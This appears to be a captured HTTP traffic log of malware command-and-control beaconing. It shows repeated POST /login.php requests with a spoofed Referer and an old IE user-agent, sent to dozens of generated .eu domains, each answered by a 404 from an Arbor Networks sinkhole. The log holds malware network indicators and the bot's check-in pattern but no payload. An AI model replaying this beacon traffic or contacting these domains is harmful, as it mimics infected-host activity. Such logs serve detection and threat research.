Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: vocumucokaj.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:08 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: divesosisor.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:55 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: fodakyhijyv.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: dixesywyruc.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:36 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: jewuqyjywyv.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: fokyxazolar.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: gadufiwabim.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: vojacikigep.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: vojeqamutuf.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:36 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: divesosisor.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:55 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: nopegymozow.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: nopegymozow.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ryqecolijet.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:06 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: kefuwidijyp.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lyvejujolec.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: vonodecidid.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:40 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: cinepycusaw.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: kefuwidijyp.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: vojeqamutuf.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:36 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: fokyxazolar.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: vocebufazap.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:43 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: rycovuvutiq.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:36 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: tunujolavez.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:06 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: rycovuvutiq.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:36 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: marytymenok.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: rynazuqihoj.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lysuxinebyg.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:43 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: vocumucokaj.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:08 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: dixesywyruc.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:36 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ryqecolijet.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: gatedyhavyd.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: gadufiwabim.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: cinepycusaw.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: jenokirifux.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:26 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: gacezobeqon.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:28 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lyruxyxaxaw.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lysuxinebyg.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:43 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: tunujolavez.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: fodakyhijyv.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: jefapexytar.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: kemocujufys.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: vopibycywow.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:36 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: foxivusozuc.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: jenokirifux.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:26 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: rynazuqihoj.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: kemocujufys.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:06 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ciqanukaxas.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:34 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: xukovoruput.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:26 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ciliqikytec.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:05 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: diselahidaf.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:41 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: vonodecidid.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:40 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: vopibycywow.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Tue, 13 Feb 2018 20:38:36 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ciliqikytec.eu

Content-Length: 9

Cache-Control: no-cache

